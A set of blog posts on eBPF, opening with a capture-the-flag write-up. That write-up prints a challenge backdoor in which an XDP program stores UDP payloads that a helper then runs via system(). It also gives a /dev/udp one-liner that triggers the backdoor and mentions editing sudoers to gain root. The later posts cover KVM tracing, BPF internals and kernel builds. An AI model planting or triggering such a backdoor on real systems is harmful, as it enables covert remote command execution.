An entertaining eBPF XDP adventure

In this post, I discuss about the CTF competition track of NorthSec, an awesome security conference and specifically about our tale of collecting two elusive flags that happened to be based upon eBPF XDP technology – something that is bleeding edge and uber cool!

In case you did not know, eBPF eXpress Data Path (XDP) is redefining how network traffic is handled on devices. Filtering, routing and reshaping of incoming packets at a very early stage even before the packets enter the networking stack the other Linux kernel has allowed unprecedented speed and provides a base for applications in security (DDoS mitigation), networking and performance domain. There is a lot of material from Quentin Monnet, Julia Evans, Cilium and IOVisor projects, about what eBPF/XDP is capable of. For the uninitiated, generic information about eBPF can also be found on Brendan Gregg’s eBPF page and links. If you think you want to get serious about this, here are some more links and detailed docs. In a recent talk I gave, I showed a diagram similar to the one below – as I started teasing myself on the possible avenues beyond the performance monitoring and tracing usecase that is dear to my heart :

cls-xdp
TC with cls_bpf and XDP. Actions on packet data is taken at the driver level in XDP

The full presentation is here. So, what’s interesting here is that the incoming packets from the net-device can now be statefully filtered or manipulated even before they reach the network stack. This has been made possible by the use of extended Berkeley Packet Filter (eBPF) programs which allows such low-level actions at the driver level to be flexibly programmed in a safe manner from the userspace. The programming is done in a restricted-C syntax that gets compiled to BPF bytecode by LLVM/Clang. The bpf() syscall then allows the bytecode to be sent to the kernel at proper place – here, these are the ‘hooks’ at ingress and egress of raw packets. Before getting attached, the program goes through a very strict verifier and an efficient JIT compiler that converts the BPF programs to native machine code (which is what makes eBPF pretty fast) Unlike the register struct context for eBPF programs attached to Kprobes, the context passed to the XDP eBPF programs is the XDP metadata struct. The data is directly read and parsed from within the BPF program, reshaped if required and an action taken for it. The action can be either XDP_PASS, where it is passed to the network stack as seen in the diagram, or XDP_DROP, where it dropped by essentially sending it back to the driver queue and XDP_TX which sends the packets back to the NIC they came from. While the packet PASS and DROP can be a good in scenarios such as filtering IPs, ports and packet contents, the TX usecase is more suited for load balancing where the packet contents can be modified and transmitted back to the NIC. Currently, Facebook is exploring its use and presented their load balancing and DDoS prevention framework based on XDP in the recent Netdev 2.1 in Montreal. Cilium Project is another example of XDP’s use in container networking and security and is an important project resulting from the eBPF tech.

NorthSec BPF Flag – Take One

Ok, enough of XDP basics for now. Coming back to the curious case of a fancy CTF challenge at NorthSec, we were presented with a VM and told that “Strange activity has been detected originating from the rao411 server, but our team has been unable to understand from where the commands are coming from, we need your help.” It also explicitly stated that the machine was up-to-date Ubuntu 17.04 with an unmodified kernel. Well, for me that is a pretty decent hint that this challenge would require kernel sorcery. Simon checked the /var/log/syslog and saw suspicions prints every minute or two that was causing the /bin/true command to run. Pretty strange. We sat together and still tried to use netcat to listen to network chatter on multiple ports as we guessed that something was being sent from outside to the rao411 server.  Is it possible that the packets were somehow being dropped even before they reached the network stack? We quickly realized that what we were seeing was indeed related to BPF as we saw some files lying around in the VM which looked like these (post CTF event, Julien Desfossez, who designed the challenge has been generous enough to provide the code, which itself is based on Jesper Dangaard Brouer’s code in the kernel source tree) As we see, there are the familiar helper functions used for loading BPF programs and manipulating BPF maps. Apart from that, there was the xdp_nsec_kern.c file which contained the BPF program itself! A pretty decent start it seems 🙂 Here is the code for the parse_port() function in the BPF XDP program that is eventually called when a packet is encountered :


u32 parse_port(struct xdp_md *ctx, u8 proto, void *hdr)
{
void *data_end = (void *)(long)ctx->data_end;
struct udphdr *udph;
u32 dport;
char *cmd;
unsigned long payload_offset;
unsigned long payload_size;
char *payload;
u32 key = 0;

if (proto != IPPROTO_UDP) {
return XDP_PASS;
}

udph = hdr;
if (udph + 1 > data_end) {
return XDP_ABORTED;
}

payload_offset = sizeof(struct udphdr);
payload_size = ntohs(udph->len) - sizeof(struct udphdr);

dport = ntohs(udph->dest);
if (dport == CMD_PORT + 1) {
return XDP_DROP;
}

if (dport != CMD_PORT) {
return XDP_PASS;
}

if ((hdr + payload_offset + CMD_SIZE) > data_end) {
return XDP_ABORTED;
}
cmd = bpf_map_lookup_elem(&nsec, &key);
if (!cmd) {
return XDP_PASS;
}
memset(cmd, 0, CMD_SIZE);
payload = &((char *) hdr)[payload_offset];
cmd[0] = payload[0];
cmd[1] = payload[1];
cmd[2] = payload[2];
cmd[3] = payload[3];
cmd[4] = payload[4];
cmd[5] = payload[5];
cmd[6] = payload[6];
cmd[7] = payload[7];
cmd[8] = payload[8];
cmd[9] = payload[9];
cmd[10] = payload[10];
cmd[11] = payload[11];
cmd[12] = payload[12];
cmd[13] = payload[13];
cmd[14] = payload[14];
cmd[15] = payload[15];

return XDP_PASS;
}

Hmmm… this is a lot of information. First, we observe that the destination port is extracted from the UDP header by the BPF program and the packets are only passed if the destination port is CMD_PORT (which turns out to be 9000 as defined in the header xdp_nsec_common.h). Note that the XDP actions are happening too early, hence even if we were to listen at port 9000 using netcat, we would not see any activity. Another pretty interesting thing is that some payload from the packet is being used to prepare a cmd string. What could that be? Why would somebody prepare a command from a UDP packet? 😉

Lets dig deep. So, the /var/log/syslog was saying that it is executing xdp_nsec_cmdline intermittently and executing /bin/true. Maybe there is something in that file? A short glimpse of xdp_nsec_cmdline.c confirms our line of thought! Here is the snippet from its main function :

int main(int argc, char **argv)
{
.
.
    cmd = malloc(CMD_SIZE * sizeof(char));
    fd_cmd = open_bpf_map(file_cmd);

    memset(cmd, 0, CMD_SIZE);
    ret = bpf_map_lookup_elem(fd_cmd, &key, cmd);
    printf("cmd: %s, ret = %d\n", cmd, ret);
    close(fd_cmd);
    ret = system(cmd);
.
.
}

The program opens the pinned BPF map file_cmd (which actually is /sys/fs/bpf/nsec) and looks up the value stored and executes it. Such Safe. Much Wow. It seems we are very close. We just need to craft a UDP packet which then updates the map with the command in payload. The first flag was a file called flag which was not accessible by the logged in raops user. So we just made a script in /tmp which changed permission for that file and sent the UDP packet containing our script.

Trivia! Bash has an alias to send UDP packets :
echo -n "/tmp/a.sh" >/dev/udp//9000 

So, we now just had to wait for the program to run the xdp_nsec_cmdline which would trigger our script. And of course it worked! We opened the flag and submitted it. 6 points to InfoSecs!

NorthSec BPF Flag – Take Two

Of course, our immediate action next was to add raops user to /etc/sudoers 😉 Once we had root access, we could now recompile and re-insert the BPF program as we wished. Simon observed an interesting check in the BPF XDP program listed above that raised our brows :

...
    if (dport == CMD_PORT + 1) {
        return XDP_DROP;
    }

    if (dport != CMD_PORT) {
        return XDP_PASS;
    }
...

Why would someone want to drop the packets coming at 9001 explicitly? Unless..there was a message being sent on that port from outside! While not an elegant approach, we just disabled the XDP_DROP check so that the packet would reach the network stack and we could just netcat the data on that port. Recompile, re-insert and it worked! The flag was indeed being sent on 9001 which was no longer dropped now. 8 points to InfoSecs!

Mandatory cool graphic of us working

I really enjoyed this gamification of advanced kernel tech as it increases its reach to the young folks interested in Linux kernel internals and modern networking technologies. Thanks to Simon Marchi for seeing this through with me and Francis Deslauriers for pointing out the challenge to us! Also, the NorthSec team (esp. Julien Desfossez and Michael Jeanson) who designed this challenge and made the competition more fun for me! Infact Julien started this while watching the XDP talks at Netdev 2.1. Also, thanks to the wonderful lads Marc-Andre, Ismael, Felix, Antoine and Alexandre from University of Sherbrooke who kept the flag chasing momentum going 🙂 It was a fun weekend! That’s all for now. If I get some more time, I’d write about an equally exciting LTTng CTF (Common Trace Format) challenge which Simon cracked while I watched from the sidelines.

EDIT : Updated the above diagram to clarify that XDP filtering happens early at the driver level – even before TC ingress and egress. TC with cls_bpf also allows BPF programs to be run. This was indeed a precursor to XDP.

Advertisements

Analyzing KVM Hypercalls with eBPF Tracing

I still visit my research lab quite often. It’s always nice to be in the zone where boundaries of knowledge are being pushed further and excitement is in the air. I like this ritual as this is a place where one can discuss linux kernel code and philosophy of life all in a single sentence while we quietly sip our hipster coffee cups.

In the lab, Abder is working these days on some cool hypercall stuff. The exact details of his work are quite complex, but he calls his tool hypertrace. I think I am sold on the name already. Hypercalls are like syscalls, but instead of such calls going to a kernel, they are made from guest to the hypervisor with arguments and an identifier value (just like syscalls). The hypervisor then brokers the privileged operation for the guest. Pretty neat. Here is some kernel documentation on hypercalls.

So Abder steered one recent discussion towards internals of KVM and wanted to know the latency caused by a hypercall he was introducing for his experiments (as I said he is introducing new hypercall with an id – for example 42). His analysis usecase was quite specific – he wanted to trace the kvm_exit -> kvm_hypercall -> kvm_entry sequence to know the exact latency he was causing for a given duration. In addition the tracing overhead needs to be minimum and is for a short duration only. This is somewhat trivial. These 3 tracepoints are there in the kernel already and he could latch on to them. Essentially, he needs to look for exit_reason argument of the kvm_exit tracepoint and it should be a VMCALL (18), which would denote that a hypercall is coming up next. Then he could look at the next kvm_exit event and find the time-delta to get the latency. Even though it is possible by traditional tracing such as LTTng and Ftrace to record events, Abder was only interested in his specific hypercall (nr = 42) along with the kvm_exit that happened before (with exit_reason = 18) and kvm_entry after that. This is not straightforward. It’s not possible to do such specific tracing with traditional tracers at a high speed and low overhead. This means the selection of events should not just be a simple filter, but should be stateful. Just when Abder was about to embark on a journey of kprobes and kernel modules, I once more got the opportunity of being Morpheus and said “What if I told you…

The rest is history. (dramatic pause)

Jokes apart, here is a small demo of eBPF/BCC script that allows us to hook onto the 3 aforementioned tracepoints in the Linux kernel and conditionally record the trace events:

from __future__ import print_function
from bcc import BPF

# load BPF program
b = BPF(text="""
#define EXIT_REASON 18
BPF_HASH(start, u8, u8);

TRACEPOINT_PROBE(kvm, kvm_exit) {
    u8 e = EXIT_REASON;
    u8 one = 1;
    if (args->exit_reason == EXIT_REASON) {
        bpf_trace_printk("KVM_EXIT exit_reason : %d\\n", args->exit_reason);
        start.update(&e, &one);
    }
    return 0;
}

TRACEPOINT_PROBE(kvm, kvm_entry) {
    u8 e = EXIT_REASON;
    u8 zero = 0;
    u8 *s = start.lookup(&e);
    if (s != NULL && *s == 1) {
        bpf_trace_printk("KVM_ENTRY vcpu_id : %u\\n", args->vcpu_id);
        start.update(&e, &zero);
    }
    return 0;
}

TRACEPOINT_PROBE(kvm, kvm_hypercall) {
    u8 e = EXIT_REASON;
    u8 zero = 0;
    u8 *s = start.lookup(&e);
    if (s != NULL && *s == 1) {
        bpf_trace_printk("HYPERCALL nr : %d\\n", args->nr);
    }
    return 0;
};
""")

# header
print("%-18s %-16s %-6s %s" % ("TIME(s)", "COMM", "PID", "EVENT"))

# format output
while 1:
    try:
        (task, pid, cpu, flags, ts, msg) = b.trace_fields()
    except ValueError:
        continue

    print("%-18.9f %-16s %-6d %s" % (ts, task, pid, msg))

The TRACEPOINT_PROBE() interface in BCC allows us to use static tracepoints in the kernel. For example, whenever a kvm_exit occurs in the kernel, the first probe is executed and it records the event if the exit reason was VMCALL. At the same time it updates a BPF hash map, which basically acts like a flag here for other events. I recommend you to check out Lesson 12 from the BCC Python Developer Tutorial if this seems interesting to you 🙂 In addition, perhaps the reference guide lists the most important C and Python APIs for BCC.

To test the above example out, we can introduce our own hypercall in the VM using this small test program :

#define do_hypercall(nr, p1, p2, p3, p4) \
__asm__ __volatile__(".byte 0x0F,0x01,0xC1\n"::"a"(nr), \
    "b"(p1), \
    "c"(p2), \
    "d"(p3), \
    "S"(p4))

void main()
{
    do_hypercall(42, 0, 0, 0, 0);
}

While the BPF program is running, if we do a hypercall, we get the following output :

TIME(s)            COMM             PID    EVENT
1795.472072000     CPU 0/KVM        7288   KVM_EXIT exit_reason : 18
1795.472112000     CPU 0/KVM        7288   HYPERCALL nr : 42
1795.472119000     CPU 0/KVM        7288   KVM_ENTRY vcpu_id : 0

So we see how in a few minutes we could precisely gather only those events that were of interest to us – saving us from the hassle of setting up other traces or kernel modules. eBPF/BCC based analysis allowed us to conditionally trace only a certain subsection of events instead of the huge flow of events that we would have had to analyze offline. KVM  internals are like a dark dungeon and I feel as if I am embarking on a quest here. There are a lot more upcoming KVM related analysis we are doing with eBPF/BCC. Stay tuned for updates! If you find any more interesting usecases for eBPF in the meantime, let me know. I would love to try them out! As always, comments, corrections and criticisms are welcome.

BPF Internals – II

Continuing from where I left before, in this post we would see some of the major changes in BPF that have happened recently – how it is evolving to be a very stable and accepted in-kernel VM and can probably be the next big thing – in not just filtering but going beyond. From what I observe, the most attractive feature of BPF is its ability to give access to the developers so that they can execute dynamically compiled code within the kernel – in a limited context, but still securely. This itself is a valuable asset.

As we have seen already, the use of BPF is not just limited to filtering out network packets but for seccomp, tracing etc. The eventual step for BPF in such a scenario was to evolve and come out of it’s use in the network filtering world. To improve the architecture and bytecode, lots of additions have been proposed. I started a bit late when I saw Alexei’s patches for kernel version 3.17-rcX. Perhaps, this was the relevant mail by Alexei that got me interested in the upcoming changes. So, here is a summary of what all major changes have occured. We will be seeing each of them in sufficient detail.

Architecture

The classic BPF we discussed in the last post had two 32 bit registers – A and X. All arithmetic operations were supported and performed using these two registers. The newer BPF called extended-BPF or eBPF has ten 64 bit registers and supports arbitary load/stores. It also contains new instructions like BPF_CALL which can be used to call some new kernel-side helper functions. We will look into this in detail a bit later as well. The new eBPF follows calling conventions which are more like modern machines (x86_64). Here is the mapping of the new eBPF registers to x86 registers :

R0 – rax      return value from function
R1 – rdi      1st argument
R2 – rsi      2nd argument
R3 – rdx      3rd argument
R4 – rcx      4th argument
R5 – r8       5th argument
R6 – rbx      callee saved
R7 - r13      callee saved
R8 - r14      callee saved
R9 - r15      callee saved
R10 – rbp     frame pointer

The closeness to the machine ABI also ensures that unnecessary register spilling/copying can be avoided. The R0 register stores the return from the eBPF program and the eBPF program contexts can be loaded through register R1. Earlier, there used to be just two jump targets i.e. either jump to TRUE or FALSE targets. Now, there can be arbitary jump targets – true or fall through. Another aspect of the eBPF instruction set is the ease of use with the in-kernel JIT compiler. eBPF Registers and most instructions are now mapped one-to-one. This makes emitting these eBPF instructions from any external compiler (in userspace) not such a daunting task. Of course, prior to any execution, the generated bytecode is passed through a verifier in the kernel to check its sanity. The verifier in itself is a very interesting and important piece of code and probably story for another day.

Building BPF Programs

From a users perspective, the new eBPF bytecode can now be another headache to generate. But fear not, an LLVM based backend now supports instructions being generated for BPF pseudo-machine type directly. It is being ‘graduated’ from just being an experimental backend and can hit the shelf anytime soon. In the meantime, you can always use this script to setup the BPF supported LLVM yourslef. But, then what next? So, a BPF program (not necessarily just a filter anymore) can be done in two parts – A kernel part (the BPF bytecode which will get loaded in the kernel) and the userspace part (which may, if needed gather data from the kernel part) Currently you can specify a eBPF program in a restricted C like language. For example, here is a program in the restricted C which returns true if the first argument of the input program context is 42.  Nothing fancy :

#include <include/bpf.h>

int answer(struct bpf_context *ctx)
{
    int life;
    life = ctx->arg1;

    if (life == 42){
        return 1;
    }
    return 0;
}

This C like syntax generates a BPF binary which can then be loaded in the kernel. Here is what it looks like in BPF ‘assembly’ representation as generated by the LLVM backed (supplied with 3.4) :

        .text
        .globl  answer
        .align  8
answer:                                 # @answer
# BB#0:
        ldw     r1, 0(r1)
        mov     r0, 1
        mov     r2, 42
        jeq     r1, r2 goto .LBB0_2
# BB#1:
        mov     r0, 0
.LBB0_2:
        andi    r0, 1
        ret

If you are adventerous enough, you can also probably write complete and valid BPF programs in assembly in a single go – right from your userspace program. I do not know if this is of any use these days. I have done this sometime back for a moderately elaborate trace filtering program though. It is also not effective as well, becasue I think at this point in human history, LLVM can generate assembly better and more efficiently than a human.

What we discussed just now is probably not a relevant program anymore. An example by Alexei here is what is more relevant these days. With the integration of Kprobe with BPF, a BPF program can be run at any valid dynamically instrumentable function in the kernel. So now, we can probably just use pt_regs as the context and get individual register values at each time the probe is hit. As of now, some helper functions are available in BPF as well, which can get the current timestamp. You can have a very cheap tracing tool right there 🙂

BPF Maps

I think one of the most interesting features in this new eBPF is the BPF maps. It looks like an abstract data type – initially a hash-table, but from kernel 3.19 onwards, support for array-maps seems to have been added as well. These bpf_maps can be used to store data generated from a eBPF program being executed. You can see the implementation details in arraymap.c or hashtab.c Lets pause for a while and see some more magic added in eBPF – esp. the BPF syscall which forms the primary interface for the user to interact and use eBPF. The reason we want to know more about this syscall is to know how to work with these cool BPF maps.

BPF Syscall

Another nice thing about eBPF is a new syscall being added to make life easier while dealing with BPF programs. In an article last year on LWN Jonathan Corbet discussed the use of BPF syscall. For example, to load a BPF program you could call

syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));

with of course, the corresponding bpf_attr structure being filled before :

union bpf_attr attr = {
    .prog_type = prog_type, /* kprobe filter? socket filter? */  
    .insns = ptr_to_u64((void *) insns), /* complete bpf instructions */
    .insn_cnt = prog_len / sizeof(struct bpf_insn), /* how many? */
    .license = ptr_to_u64((void *) license), /* GPL maybe */
    .log_buf = ptr_to_u64(bpf_log_buf), /* log buffer */
    .log_size = LOG_BUF_SIZE,
    .log_level = 1,
};

Yes, this may seem cumbersome to some, so for now, there are some wrapper functions in bpf_load.c and libbpf.c released to help folks out where you may need not give too many details about your compiled bpf program. Much of what happens in the BPF syscall is determined by the arguments supported here. To elaborate more, let’s see how to load the BPF program we did before. Assuming that we have the sample program in its BPF bytecode form generated and now we want to load it up, we take the help of the wrapper function load_bpf_file() which parses the BPF ELF file and extracts the BPF bytecode from the relevant section. It also iterates over all ELF sections to get licence info, map info etc. Eventually, as per the type of BPF program – Kprobre/kretprobe or socket program, and the info and bytecode just gathered from the ELF parsing, the bpf_attr attribute structure is filled and actual syscall is made.

Creating and accessing BPF maps

Coming back to the maps, apart from this simple syscall to load the BPF program, there are many more actions that can be taken based on just the arguments. Have a look at bpf/syscall.c From the userspace side the new BPF syscall comes to the rescue and allows most of these operations on bpf_maps to be performed! From the kernel side however, with some special helper function and the use of BPF_CALL instruction, the values in these maps can be updated/deleted/accessed etc. These helpers inturn call the actual function according to the type of map – hash-map or an array. For example, here is a BPF program that just creates an array-map and does nothing else,

#include <uapi/linux/bpf.h>
#include "bpf_helpers.h"
#include <linux/version.h>

struct bpf_map_def SEC("maps") sample_map = { 
    .type = BPF_MAP_TYPE_ARRAY,
    .key_size = sizeof(u32),
    .value_size = sizeof(unsigned int),
    .max_entries = 1000,
};

char _license[] SEC("license") = "GPL";
u32 _version SEC("version") = LINUX_VERSION_CODE;

When loaded in the kernel, the array-map is created. Form the userspace we can then probably initialize the map with some values with a function that look likes this,

static void init_array() 
{
    int key;
    for (key = 0; key < 1000; key++) {
        bpf_update_elem(map_fd[0], &key, &value1, BPF_ANY);
    }
}

where bpf_update_elem() wrapper is in-turn calling the BPF syscall with proper arguments and attributes as,

syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));

This inturn calls map_update_elem() which securely copies the key and value using copy_from_user() and then calls the specialized function for updating the value for array-map at the specified index. Similar things happen for reading/deleting/creating has or array maps from userspace.

So probably, things will start falling into pieces now from the earlier post by Brendan Gregg where he was updating a map from the BPF program (using the BPF CALL instruction which calls the internal kernel helpers) and then concurrently accessing it from userspace to generate a beautiful histogram (through the syscall I just mentioned above). BPF Maps are indeed a very powerful addition to the system. You can also checkout more detailed and complete examples now that you know what is going on. To summarize, this is how an example BPF program written in restricted C for kernel part and normal C for userspace part would run these days:

eBPF-session

In the next BPF post, I will discuss the eBPF  verifier in detail. This is the most crucial part of BPF and deserves detailed attention I think. There is also something cool happening these days on the Plumgrid side I think – the BPF Compiler Collection. There was a very interesting demo using such tools and the power of eBPF at the recent Red Hat Summit. I got BCC working and tried out some examples with probes – where I could easily compile and load BPF programs from my Python scripts! How cool is that 🙂 Also, I have been digging through the LTTng’s interpreter lately so probably another post detailing how the BPF and LTTng’s interpreters work would be nice to know. That’s all for now. Run BPF.

BPF Internals – I

Recent post by Brendan Gregg inspired me to write my own blog post about my findings of how Berkeley Packet Filter (BPF) evolved, it’s interesting history and the immense powers it holds – the way Brendan calls it ‘brutal’. I came across this while studying interpreters and small process virtual machines like the proposed KTap’s VM. I was looking at some known papers on register vs stack basd VMs, their performances and various code dispatch mechanisms used in these small VMs. The review of state-of-the-art soon moved to native code compilation and a discussion on LWN caught my eye. The benefits of JIT were too good to be overlooked, and BPF’s application in things like filtering, tracing and seccomp (used in Chrome as well) made me interested. I knew that the kernel devs were on to something here. This is when I started digging through the BPF background.

Background

Network packet analysis requires an interesting bunch of tech. Right from the time a packet reaches the embedded controller on the network hardware in your PC (hardware/data link layer) to the point they do someting useful in your system, such as display something in your browser (application layer). For connected systems evolving these days, the amount of data transfer is huge, and the support infrastructure for the network analysis needed a way to filter out things pretty fast. The initial concept of packet filtering developed keeping in mind such needs and there were many stategies discussed with every filter such as CMU/Stanford packet Filter (CSPF), Sun’s NIT filter and so on. For example, some earlier filtering approaches used a tree based model (in CSPF) to represenf filters and filter them out using predicate-tree walking. This earlier approach was also inherited in the Linux kernel’s old filter in the net subsystem.

Consider an engineer’s need to have a probably simple and unrealistic filter on the network packets with the predicates P1, P2, P3 and P4 :

equation

Filtering approach like the one of CSPF would have represented this filter in a expression tree structure as follows:

tree

It is then trivial to walk the tree evaluating each expression and performing operations on each of them. But this would mean there can be extra costs assiciated with evaluating the predicates which may not necessarily have to be evaluated. For example, what if the packet is neither an ARP packet nor an IP packet? Having the knowledge that P1 and P2 predicates are untrue, we may need not have to evaluate other 2 predicates and perform 2 other boolean operation on them to determine the outcome.

In 1992-93, McCanne et al. proposed a BSD Packet Filter with a new CFG-bytecode based filter design. This was an in-kernel approach where a tiny interpreter would evaluate expressions represented as BPF bytecodes. Instead of simple expression trees, they proposed a CFG based filter design. One of the control flow graph representation of the same filter above can be:

cfg

The evaluation can start from P1 and the right edge is for FALSE and left is for TRUE with each predicate being evaluated in this fashion until the evaluation reaches the final result of TRUE or FALSE. The inherent property of ‘remembering’ in the CFG, i.e, if P1 and P2 are false, the path reaches a final FALSE is remembered and P3 and P4 need not be evaluated. This was then easy to represent in bytecode form where a minimal BPF VM can be designed to evaluate these predicates with jumps to TRUE or FALSE targets.

The BPF Machine

A pseudo-instruction representation of the same filter described above for earlier versions of BPF in Linux kernel can be shown as,

l0:    ldh [12]
l1: jeq #0x800, l3, l2
l2:     jeq #0x805, l3, l8
l3: ld [26]
l4: jeq #SRC, l4, l8
l5:     ld len
l6:     jlt 0x400, l7, l8
l7: ret #0xffff
l8: ret #0

To know how to read these BPF instructions, look at the filter documentation in Kernel source and see what each line does. Each of these instructions are actually just bytecodes which the BPF machine interprets. Like all real machines, this requires a definition of how the VM internals would look like. In the Linux kernel’s version of the BPF based in-kernel filtering technique they adopted, there were initially just 2 important registers, A and X with another 16 register ‘scratch space’ M[0-15]. The Instruction format and some sample instructions for this earlier version of BPF are shown below:

/* Instruction format: { OP, JT, JF, K }
 * OP: opcode, 16 bit
 * JT: Jump target for TRUE
 * JF: Jump target for FALSE
 * K: 32 bit constant
 */

/* Sample instructions*/
{ 0x28,  0,  0, 0x0000000c },     /* 0x28 is opcode for ldh */
{ 0x15,  1,  0, 0x00000800 },     /* jump next to next instr if A = 0x800 */
{ 0x15,  0,  5, 0x00000805 },     /* jump to FALSE (offset 5) if A != 0x805 */
..

There were some radical changes done to the BPF infrastructure recently – extensions to its instruction set, registers, addition of things like BPF-maps etc. We shall discuss what those changes in detail, probably in the next post in this series. For now we’ll just see the good ol’ way of how BPF worked.

Interpreter

Each of the instructions seen above are represented as arrays of these 4 values and each program is an array of such instructions. The BPF interpreter sees each opcode and performs the operations on the registers or data accordingly after it goes through a verifier for a sanity check to make sure the filter code is secure and would not cause harm. The program which consists of these instructions, then passes through a dispatch routine. As an example, here is a small snippet from the BPF instruction dispatch for the instruction ‘add’ before it was restructured in Linux kernel v3.15 onwards,

127         u32 A = 0;                      /* Accumulator */
128         u32 X = 0;                      /* Index Register */
129         u32 mem[BPF_MEMWORDS];          /* Scratch Memory Store */
130         u32 tmp;
131         int k;
132
133         /*
134          * Process array of filter instructions.
135          */
136         for (;; fentry++) {
137 #if defined(CONFIG_X86_32)
138 #define K (fentry->k)
139 #else
140                 const u32 K = fentry->k;
141 #endif
142 
143                 switch (fentry->code) {
144                 case BPF_S_ALU_ADD_X:
145                         A += X;
146                         continue;
147                 case BPF_S_ALU_ADD_K:
148                         A += K;
149                         continue;
150 ..

Above snippet is taken from net/core/filter.c in Linux kernel v3.14. Here, fentry is the socket_filter structure and the filter is applied to the sk_buff data element. The dispatch loop (136), runs till all the instructions are exhaused. The dispatch is basically a huge switch-case dispatch with each opcode being tested (143) and necessary action being taken. For example, here an ‘add’ operation on registers would add A+X and store it in A. Yes, this is simple isn’t it? Let us take it a level above.

JIT Compilation

This is nothing new. JIT compilation of bytecodes has been there for a long time. I think it is one of those eventual steps taken once an interpreted language decides to look for optimizing bytecode execution speed. Interpreter dispatches can be a bit costly once the size of the filter/code and the execution time increases. With high frequency packet filtering, we need to save as much time as possible and a good way is to convert the bytecode to native machine code by Just-In-Time compiling it and then executing the native code from the code cache. For BPF, JIT was discussed first in the BPF+ research paper by Begel etc al. in 1999. Along with other optimizations (redundant predicate elimination, peephole optimizations etc,) a JIT assembler for BPF bytecodes was also discussed. They showed improvements from 3.5x to 9x in certain cases. I quickly started seeing if the Linux kernel had done something similar. And behold, here is how the JIT looks like for the ‘add’ instruction we discussed before (Linux kernel v3.14),

288                switch (filter[i].code) {
289                case BPF_S_ALU_ADD_X: /* A += X; */
290                        seen |= SEEN_XREG;
291                        EMIT2(0x01, 0xd8);              /* add %ebx,%eax */
292                        break;
293                case BPF_S_ALU_ADD_K: /* A += K; */
294                        if (!K)
295                                break;
296                        if (is_imm8(K))
297                                EMIT3(0x83, 0xc0, K);   /* add imm8,%eax */
298                        else
299                                EMIT1_off32(0x05, K);   /* add imm32,%eax */
300                        break;

As seen above in arch/x86/net/bpf_jit_comp.c for v3.14, instead of performing operations during the code dispatch directly, the JIT compiler emits the native code to a memory area and keeps it ready for execution.The JITed filter image is built like a function call, so we add some prologue and epilogue to it as well,

/* JIT image prologue */
221                EMIT4(0x55, 0x48, 0x89, 0xe5); /* push %rbp; mov %rsp,%rbp */
222                EMIT4(0x48, 0x83, 0xec, 96);    /* subq  $96,%rsp       */

There are rules to BPF (such as no-loop etc.) which the verifier checks before the image is built as we are now in dangerous waters of executing external machine code inside the linux kernel. In those days, all this would have been done by bpf_jit_compile which upon completion would point the filter function to the filter image,

774                 fp->bpf_func = (void *)image;

Smooooooth… Upon execution of the filter function, instead of interpreting, the filter will now start executing the native code. Even though things have changed a bit recently, this had been indeed a fun way to learn how interpreters and JIT compilers work in general and the kind of optimizations that can be done. In the next part of this post series, I will look into what changes have been done recently, the restructuring and extension efforts to BPF and its evolution to eBPF along with BPF maps and the very recent and ongoing efforts in hist-triggers. I will discuss about my experiemntal userspace eBPF library and it’s use for LTTng’s UST event filtering and its comparison to LTTng’s bytecode interpreter. Brendan’s blog-post is highly recommended and so are the links to ‘More Reading’ in that post.

Thanks to Alexei Starovoitov, Eric Dumazet and all the other kernel contributors to BPF that I may have missed. They are doing awesome work and are the direct source for my learnings as well. It seems, looking at versatility of eBPF, it’s adoption in newer tools like shark, and with Brendan’s views and first experiemnts, this may indeed be the next big thing in tracing.

Custom Kernel on Fedora 20

I recently stared experimenting with eBPF patches by Alexei Starovoitov which apparently are extending and restructuring the Berkeley Packet Filter infrastructure in the kernel. BPF is used for a lot of tasks like syscall filtering, packets filtering etc. and obviously deserves a separate and grand blog entry. Well, we’ll see what can be done about it later but for now, I’ll just explain how to do the trivial task of installing a custom kernel (possibly patched/upstream) on your Fedora machine. Its nothing grand, just those familiar textbook tasks. I am using the master from Alexei’s repo.

Build the kernel

git clone https://kernel.googlesource.com/pub/scm/linux/kernel/git/ast/bpf
cd bpf

I changed the EXTRAVERSION string in the Makefile just to differentiate it as I may have to use multiple versions while testing.

make menuconfig
make -j4

Set it up

sudo make modules_install
sudo cp arch/x86_64/boot/bzImage "/boot/vmlinuz-"`make kernelrelease`
sudo cp System.map "/boot/System.map-"`make kernelrelease`
sudo dracut "" `make kernelrelease`
sudo grub2-mkconfig -o /boot/grub2/grub.cfg

Restart your machine and enjoy the new kernel. Once you are done with the experiments, boot into the old kernel and remove the initrd, kernel image, and the custom system map. Then update the grub config once more. Thats it! I’ll post more about my experiments with eBPF soon.

 References

[1] http://fedoraproject.org/wiki/BuildingUpstreamKernel
[2] http://broken.build/2012/02/12/custom-kernel-on-fedora